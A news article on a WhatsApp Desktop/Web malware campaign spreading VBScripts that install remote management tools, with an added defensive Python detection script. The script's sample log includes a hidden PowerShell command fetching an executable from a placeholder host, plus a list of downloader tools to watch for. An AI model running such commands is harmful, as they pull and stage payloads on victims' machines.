New Malicious Campaign Hijacks WhatsApp Accounts to Spread Malware

by Chief Editor

A new wave of cyberattacks is targeting WhatsApp Desktop and Web users by hijacking compromised accounts to distribute malware. According to Kaspersky’s Global Research and Analysis Team (GReAT), attackers are exploiting social trust by sending malicious files disguised as routine business documents to contacts of the compromised accounts.

How the WhatsApp Malware Campaign Operates

The infection chain begins when a user opens a received file that appears to be a legitimate business document, such as an invoice, bank statement, or payment receipt. Kaspersky reports that these files are actually VBScripts. Once opened, the script executes a silent process that creates a hidden working directory on the victim’s computer.

From there, the malware downloads additional malicious components from external servers without the user’s knowledge or interaction. The primary objective of this sequence is the installation of remote management and monitoring software. By abusing legitimate administrative tools, attackers gain unauthorized remote access and control over the infected system.
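As an added illustration of how a defender might look for the chain just described (this is example code written for this page, not code from the article or from Kaspersky's report), the Python script below runs a simple process-tree rule over constructed process-creation records: a script host launching a `.vbs`, a descendant that downloads content, and a descendant that installs a remote management agent. The log format, the file and process names, the use of `attrib +h` to stand in for the hidden working directory, and the `rmm_agent_setup.exe` installer name are all assumptions; the article names none of these specifics.

```python
"""Toy process-tree detection for a VBScript -> download -> RMM-install chain.

Constructed record format (one event per line):
    timestamp|pid|ppid|image|commandline
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
# Assumption: the article does not name the remote-management product.
# Replace with the agent installers actually seen in your environment.
RMM_INSTALLERS = {"rmm_agent_setup.exe"}

# Constructed sample telemetry: one malicious chain plus one benign .vbs run.
SAMPLE_LOG = r"""
2025-01-14T09:12:03|4100|3980|WhatsApp.exe|C:\Users\ana\AppData\Local\WhatsApp\WhatsApp.exe
2025-01-14T09:12:41|4188|4100|wscript.exe|wscript.exe C:\Users\ana\Downloads\Invoice_2025-01.vbs
2025-01-14T09:12:42|4190|4188|cmd.exe|cmd.exe /c mkdir C:\Users\ana\AppData\Local\Temp\wk
2025-01-14T09:12:42|4192|4190|attrib.exe|attrib +h C:\Users\ana\AppData\Local\Temp\wk
2025-01-14T09:12:45|4201|4188|powershell.exe|powershell -w hidden -c iwr http://example.invalid/s2 -OutFile C:\Users\ana\AppData\Local\Temp\wk\s2.exe
2025-01-14T09:13:10|4230|4201|rmm_agent_setup.exe|rmm_agent_setup.exe /silent
2025-01-14T09:20:00|4301|3980|wscript.exe|wscript.exe C:\Scripts\logon_cleanup.vbs
"""


@dataclass
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    image: str     # executable name, lower-cased for matching
    cmdline: str   # full command line as logged


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'ts|pid|ppid|image|cmdline' record."""
    ts, pid, ppid, image, cmdline = line.split("|", 4)
    return ProcEvent(datetime.fromisoformat(ts), int(pid), int(ppid),
                     image.lower(), cmdline)


def detect_vbs_rmm_chain(events, window_minutes=30):
    """Return one finding per .vbs script-host launch whose descendants, within
    the window, download content or install a remote management agent."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)

    findings = []
    for root in events:
        if root.image not in SCRIPT_HOSTS or ".vbs" not in root.cmdline.lower():
            continue
        stages = {"script_launch": root.cmdline}
        queue = deque(children[root.pid])
        while queue:
            e = queue.popleft()
            if (e.ts - root.ts).total_seconds() > window_minutes * 60:
                continue  # too far from the launch to be part of this chain
            if e.image in DOWNLOADERS:
                stages.setdefault("download", e.cmdline)
            elif e.image == "attrib.exe" and "+h" in e.cmdline.lower():
                # Assumed indicator for "creates a hidden working directory".
                stages.setdefault("hidden_dir", e.cmdline)
            elif e.image in RMM_INSTALLERS:
                stages.setdefault("rmm_install", e.cmdline)
            queue.extend(children[e.pid])
        # A lone .vbs run (e.g. an admin logon script) is not enough to alert on.
        if "download" in stages or "rmm_install" in stages:
            parent = by_pid[root.ppid].image if root.ppid in by_pid else "unknown"
            findings.append({"pid": root.pid, "parent": parent, "stages": stages})
    return findings


def scan(log_text: str):
    """Parse a block of records and run the chain rule over them."""
    events = [parse_event(l) for l in log_text.strip().splitlines() if l.strip()]
    return detect_vbs_rmm_chain(events)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[!] script host pid {f['pid']} launched under {f['parent']}:")
        for stage, cmd in f["stages"].items():
            print(f"    {stage:14} {cmd}")
```

Run as-is, the rule reports the chain rooted at the `Invoice_2025-01.vbs` launch under the messaging client and stays silent on the benign `logon_cleanup.vbs` run, because the latter never spawns a downloader or an installer. Tuning the window and the installer list to your own estate is the part that makes this usable rather than noisy.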

Did you know?
The malware is designed to operate silently in the background, making it difficult for the average user to detect that their system has been compromised until the attackers have already gained administrative control.

Geographic Reach and Targeted Languages

This campaign has moved beyond localized testing, with Kaspersky identifying victims across Malaysia, Brazil, Singapore, Taiwan, and Vietnam. The threat is not limited to a single region; the attackers have localized their malicious files into multiple languages, including Portuguese, English, French, and German.

This multi-language strategy suggests a deliberate effort to extend the campaign's reach into European markets. By mimicking the native language of the recipient, the attackers increase the likelihood that the target will trust and open the malicious attachment.

How to Protect Your Devices

Security experts emphasize that users should exercise extreme caution with unexpected attachments, even when they arrive from a known contact. Since the attack relies on hijacked accounts, the sender’s name is no longer a reliable indicator of safety.

  • Verify before clicking: Do not open script files or executables sent via WhatsApp without confirming the request through a secondary communication channel.
  • Keep software updated: Ensure your computer’s security software is active and updated to block unauthorized script execution.
  • Monitor system behavior: Be alert to unexpected performance issues, which can sometimes indicate that a remote management tool is running in the background.

Pro Tip:
If you receive a document you weren’t expecting, call or message the contact on a different platform to verify they actually sent the file before downloading it.

Frequently Asked Questions

Is the WhatsApp mobile app affected by this malware?

Kaspersky’s findings specifically highlight WhatsApp Desktop and WhatsApp Web as the primary targets for this campaign, as the malware is designed for computer operating systems.

Why does the malware use legitimate administrative tools?

Attackers use “living-off-the-land” techniques, utilizing software already installed on the system to perform malicious actions. This makes it harder for traditional antivirus programs to flag the activity as suspicious.

What should I do if I suspect my account was compromised?

If you believe your account is sending files you didn’t authorize, log out of all active web and desktop sessions immediately via the WhatsApp settings menu on your phone and change your account security settings.
